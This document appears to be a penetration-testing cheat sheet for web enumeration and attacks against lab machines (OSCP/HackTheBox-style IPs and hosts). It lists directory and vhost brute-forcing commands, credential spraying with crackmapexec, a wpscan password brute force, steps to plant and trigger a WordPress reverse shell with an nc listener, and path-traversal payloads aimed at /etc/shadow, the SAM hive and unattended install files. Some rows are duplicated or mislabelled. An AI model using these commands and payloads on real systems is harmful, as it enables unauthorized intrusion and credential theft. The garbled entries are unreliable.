WEB ENUMERATION TOOLS AND TECHNIQUES
DIRB
With Proxy (-P) and output (-o)
| Command | Description |
|---|---|
dirb http://ip | Generic Search |
dirb http://10.11.1.222 -P 10.11.1.222:8080 -o dirb_8080_10.11.1.222.txt | Using Proxy |
| BACK TO WEB ENUMERATION | REFERENCE PAGE |
GOBUSTER
With directory scan (dir) and subnet scan (vhost)
| Command | Description |
|---|---|
gobuster dir -u http://10.11.1.222:8080 -w /usr/share/wordlists/dirb/big.txt | Directory |
gobuster vhost -u http://crafty.htb -r -k -w /usr/share/seclists/Discovery/DNS/namelist.txt --append-domain | VHOST |
gobuster dns -u http://internal.analysis.htb/dashboard -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -r analysis.htb:53 --follow-redirect --add-slash -x php | DNS |
| BACK TO WEB ENUMERATION | REFERENCE PAGE |
DIRBUSTER
Dirbuster is a GUI for directory enumeration
| Command | Description |
|---|---|
dirbuster | Start GII |
| BACK TO WEB ENUMERATION | REFERENCE PAGE |
WORDLISTS
| Command | Description |
|---|---|
/opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt | Directory/Page Wordlist |
/opt/useful/SecLists/Discovery/Web-Content/web-extensions.txt | Extensions Wordlist |
/opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt | Domain Wordlist |
/opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt | Parameters Wordlist |
| BACK TO WEB ENUMERATION | REFERENCE PAGE |
CREATE WORDLISTS
| Command | Description |
|---|---|
cewl -w searchWordlists.txt -d2 -m 3 search.htb | Cewl on a Website |
crackmapexec smb search.htb search.htb -u searchWordlists.txt -p IsolationIsKey? | Use a List |
Axel is a command-line-based download accelerator for Linux | Axel |
| BACK TO WEB ENUMERATION | REFERENCE PAGE |
ENUMERATION
| Command | Description |
|---|---|
robots.txt | Take a Look |
whatweb 10.11.1.101 | Cewl on a Website |
crackmapexec smb search.htb search.htb -u searchWordlists.txt -p IsolationIsKey? | Use a List |
Axel is a command-line-based download accelerator for Linux | Axel |
| BACK TO WEB ENUMERATION | REFERENCE PAGE |
GOOGLE BOTS
Place into your user agent
| Command | Description |
|---|---|
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) | Newer version |
Googlebot/2.1 (+http://www.google.com/bot.html) | Older version |
| BACK TO WEB ENUMERATION | REFERENCE PAGE |
WORDPRESS
Particular attacks to wordpress
| Command | Description |
|---|---|
wpscan --url http://10.11.1.234 --passwords /usr/share/wordlists/rockyou.txt --usernames admin | Brute Force |
[!] Valid Combinations Found: Username: admin, Password: password | Good Result |
https://www.hackingarticles.in/wordpress-reverse-shell/ | Reference |
CHANGE 404 PAGE - PANEL --> APEARANCE --> EDITOR | Path to Replace 404 |
curl http://10.11.1.234/wp-content/themes/twentytwelve/404.php | Trigger Reverse Shell |
nc -nvlp 80 | Setup Listener |
/usr/share/seclists/Web-Shells/WordPress/plugin-shell.php | Common Reverse Shell |
| BACK TO WEB ENUMERATION | REFERENCE PAGE |
LFI / RFI
Local File Inclusion (LFI) / Remote File Inclusion (RFI)
The following list are common operating system files
| Command | Description |
|---|---|
https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini | Example |
C:\windows\win.ini | Windows |
C:\windows\system.ini | Windows |
C:\windows\iis.log | Windows |
C:\windows\System32\Drivers\etc\hosts | Windows |
C:\Windows\system32\config\SYSTEM | Windows |
C:\windows\debug\netsetup.log | Windows |
C:\windows\debug\sammui.log | Windows |
C:\windows\debug\netlogon.log | Windows |
C:\windows\debug\passwd.log | Windows |
C:\windows\system32\winevt\logs\system.evtx | Windows |
C:\windows\system32\winevt\logs\Windows Powershell.evtx | Windows |
C:\windows\WindowsUpdate.log | Windows |
C:\windows\system32\calc.exe | Windows |
C:\windows\system32\windowspowershell\v1.0\powershell.exe | Windows |
C:\windows\ccm\logs\filesystemfile.log | Windows |
C:\users\administrator\appdata\local\recently-used.xbel | Windows |
C:\users\administrator\desktop\desktop.ini | Windows |
C:\windows\panther\unattended.xml | Windows |
C:\windows\panther\unattended\unattended.xml | Windows |
C:\windows\repair\sam | Windows |
C:\windows\system32\tasks\daily | Windows |
C:\windows\panther\sysprep.inf | Windows |
/etc/passwd | Linux |
/etc/shadow | Linux |
/etc/crontab | Linux |
| BACK TO WEB ENUMERATION | REFERENCE PAGE |
CURL
Include Headers (-i)
HTTP response headers can include things like:
server name, cookies, date of the document, HTTP version and more…
With non-HTTP protocols, the “headers” are other server communication.
| Command | Description |
|---|---|
curl -i ip | Generic Description |
curl -i http://ip | Use IP |
curl -i http://url.com | Use URL |
| BACK TO WEB ENUMERATION | REFERENCE PAGE |
BURPSUITE
Common and Useful Generic Configurations
| Command | Description |
|---|---|
/etc/hosts | Add for Local DNS |
Intruder - create payloads for various inputs | Burpsuite Option |
Repeater - change a request or reply to a web server | Burpsuite Option |
Cookie Jar - used to modify or delete cookies sent from a website | Burpsuite Option |
Always Check the settings box for INTERCEPT RESPONSE | Burpsuite Option |
| BACK TO WEB ENUMERATION | REFERENCE PAGE |